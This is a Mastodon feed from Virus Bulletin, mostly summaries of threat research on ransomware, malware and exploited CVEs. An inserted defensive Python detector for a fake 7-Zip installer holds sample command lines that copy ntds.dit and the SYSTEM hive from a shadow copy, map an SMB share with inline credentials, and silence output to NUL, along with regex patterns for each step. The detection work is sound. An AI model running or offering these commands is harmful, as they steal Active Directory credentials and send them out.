Virus Bulletin

@VirusBulletin@infosec.exchange
2.5K Followers
57 Following
1.9K Posts
Security information portal, testing and certification body.
Organisers of the annual Virus Bulletin conference.
Acronis TRU researchers look into the SafePay ransomware group targeting managed service providers & small-to-midsize businesses across industries. The group appears to operate with centralized control, managing its own operations, infrastructure & negotiations. https://www.acronis.com/en-us/tru/posts/safepay-ransomware-the-fast-rising-threat-targeting-msps/
SentinelOne's Phil Stokes (@philofishal) & Dinesh Devadoss provide a technical analysis of the latest version of the macOS.ZuRu malware, along with new technical indicators to aid detection engineers and threat hunters. https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/
Huntress's John Hammond, Jamie Levy, Lindsey O'Donnell-Welch & Michael Tigges observed exploitation of a remote code execution Wing FTP Server bug (CVE-2025-47812). Organizations running Wing FTP Server should update to the fixed version. https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
After years of dominance in #ESET’s top #infostealer statistics, the era of #AgentTesla has come to an end. It finished H1 2025 in fourth place, its numbers having decreased by 57%. The reason? It is no longer under active development.
The threat actors behind Agent Tesla have reportedly lost access to the servers with the malware’s source code. A successor appeared almost immediately – another #MaaS threat, known as #SnakeStealer or #SnakeKeylogger, has claimed the number one spot.
Recommended as a suitable replacement directly in Agent Tesla’s Telegram channel, SnakeStealer now takes up almost a fifth of all infostealer detections registered by ESET telemetry. Between H2 2024 and H1 2025, its detections more than doubled.
If you want to find out more information about this changing of the guard in the infostealer threat landscape, head on over to #ESETThreatReport: https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025

🚨 Fake 7-Zip installer exfiltrates Active Directory files.
A #malicious installer disguised as 7-Zip steals critical Active Directory files, including ntds.dit and the SYSTEM hive, by leveraging shadow copies and exfiltrating the data to a remote server.
🥷 Upon execution, the #malware creates a shadow copy of the system drive to bypass file locks and extract protected files without disrupting system operations.

🎯 It then copies ntds.dit, which contains Active Directory user and group data, and SYSTEM, which holds the corresponding encryption keys.

The malware connects to a remote server via SMB using hardcoded credentials. All output is redirected to NUL to minimize traces.

👨‍💻 #ANYRUN Sandbox makes it easy to detect these stealthy operations by providing full behavioral visibility, from network exfiltration to credential staging, within a single interactive session.
🔍 See analysis session: https://app.any.run/tasks/7f03cd5b-ad02-4b3a-871f-c31ac0f5dc15/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_7zip&utm_term=090725&utm_content=linktoservice

This technique grants the attacker full access to the ntds.dit dump, allowing them to extract credentials for Active Directory objects and enabling lateral movement techniques such as Pass-the-Hash or Golden Ticket.

🚀 Analyze and investigate the latest malware and #phishing threats with #ANYRUN.
#ExploreWithANYRUN
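As an added defensive example that is not part of the ANY.RUN post above: a small correlator that groups constructed process-creation events by process tree and flags the chain the post describes (shadow copy creation, ntds.dit and the SYSTEM hive read through the shadow-copy device path, an SMB mapping with inline credentials, output silenced to NUL). The event format, the command-line forms, and the hosts, PIDs, IP address and credentials are all constructed assumptions; the post does not quote the commands the malware used.

```python
import re
from collections import defaultdict
# Constructed process-creation events. The command lines are an assumption:
# the post describes the behaviour but does not quote the commands used.
EVENTS = [
    {"host": "ws01", "pid": 4100, "ppid": 3000, "cmd": "7z_setup.exe"},
    {"host": "ws01", "pid": 4120, "ppid": 4100, "cmd": "vssadmin create shadow /for=C: > NUL 2>&1"},
    {"host": "ws01", "pid": 4130, "ppid": 4100, "cmd": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\n.dit > NUL"},
    {"host": "ws01", "pid": 4131, "ppid": 4100, "cmd": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\s.hiv > NUL"},
    {"host": "ws01", "pid": 4140, "ppid": 4100, "cmd": r"net use \\203.0.113.7\drop /user:svc Passw0rd > NUL"},
    {"host": "ws02", "pid": 900, "ppid": 800, "cmd": "vssadmin create shadow /for=C:"},  # lone backup job
]

SHADOW_CREATE = re.compile(r"vssadmin\s+create\s+shadow|shadowcopy\s+call\s+create|\bdiskshadow\b", re.I)
AD_SECRETS = re.compile(r"HarddiskVolumeShadowCopy\d+\\.*?\\(ntds\.dit|SYSTEM)\b", re.I)  # read via shadow device
SMB_CREDS = re.compile(r"\bnet\s+use\s+\\\\\S+.*?/user:", re.I)  # credentials passed on the command line
TO_NUL = re.compile(r">\s*NUL\b", re.I)  # output discarded to leave fewer traces

def _root(host, pid, parents):
    # Walk the parent chain up to the top-most process we have an event for.
    seen = set()
    while pid not in seen and (host, parents.get((host, pid))) in parents:
        seen.add(pid)
        pid = parents[(host, pid)]
    return pid

def analyze(events):
    """Correlate per process tree; return {(host, root_pid): {"severity", "findings"}}."""
    parents = {(e["host"], e["pid"]): e["ppid"] for e in events}
    trees = defaultdict(lambda: {"shadow": False, "secrets": set(), "smb": False, "nul": 0})
    for e in events:
        t, cmd = trees[(e["host"], _root(e["host"], e["pid"], parents))], e["cmd"]
        t["shadow"] |= bool(SHADOW_CREATE.search(cmd))
        t["smb"] |= bool(SMB_CREDS.search(cmd))
        t["nul"] += bool(TO_NUL.search(cmd))
        if m := AD_SECRETS.search(cmd):
            t["secrets"].add(m.group(1).lower())
    results = {}
    for key, t in trees.items():
        if not (t["shadow"] or t["secrets"]):
            continue  # nothing shadow-copy related in this tree
        findings = [f for f, hit in (
            ("shadow copy created", t["shadow"]),
            ("AD secrets read from shadow copy: " + ", ".join(sorted(t["secrets"])), t["secrets"]),
            ("SMB share mapped with inline credentials", t["smb"]),
            (f"{t['nul']} command(s) silenced with > NUL", t["nul"])) if hit]
        severity = ("critical" if {"ntds.dit", "system"} <= t["secrets"]  # the pair an offline dump needs
                    else "high" if t["secrets"] else "info")  # lone shadow copy may be a backup
        results[key] = {"severity": severity, "findings": findings}
    return results
```

A shadow copy on its own is scored low because backup software creates them routinely; the score rises only when the same process tree goes on to read ntds.dit and SYSTEM from the shadow device.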

How does Russia’s Sandworm unit exploit pirated software to target Ukraine?

Join Arda Buyukkaya from EclecticIQ at VB2025 in Berlin to uncover how cyber operations can turn everyday behaviour into large-scale threats.

📅 Sept 25 | 09:30–10:00 | Green Room

Find out more about this talk 👉 https://tinyurl.com/e9anehex

#VB2025 #cybersecurity #conference #networking

Palo Alto Networks Unit 42 researchers uncovered a campaign by an initial access broker to exploit leaked Machine Keys (cryptographic keys used on ASP.NET sites) to gain access to targeted organizations & sell that access on to other threat actors. https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/
Trellix researchers discovered a DoNot APT (aka APT-C-35, Mint Tempest, Origami Elephant, SECTOR02 & Viceroy Tiger) campaign targeting a European foreign affairs ministry. The attackers lured their targets to click on a malicious Google Drive link. https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/
Morphisec’s threat research team has uncovered the revival of Pay2Key, an Iranian-backed ransomware-as-a-service operation. Researcher Ilia Kulmin presents a technical analysis and OSINT findings, exposing Pay2Key.I2P’s operations and its ties to Mimic. https://www.morphisec.com/blog/pay2key-resurgence-iranian-cyber-warfare/
👾 #Ducex is a packer used by #Triada trojan. It stands out due to:
🔹 Native code
🔹 Encrypted functions & strings
🔹 Self-debugging
🔹 Signature checks
🔹 Frida & Xposed detection

👨‍💻 Read our technical analysis to see how it works: https://any.run/cybersecurity-blog/ducex-packer-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=ducex_analysis&utm_term=080725&utm_content=linktoblog
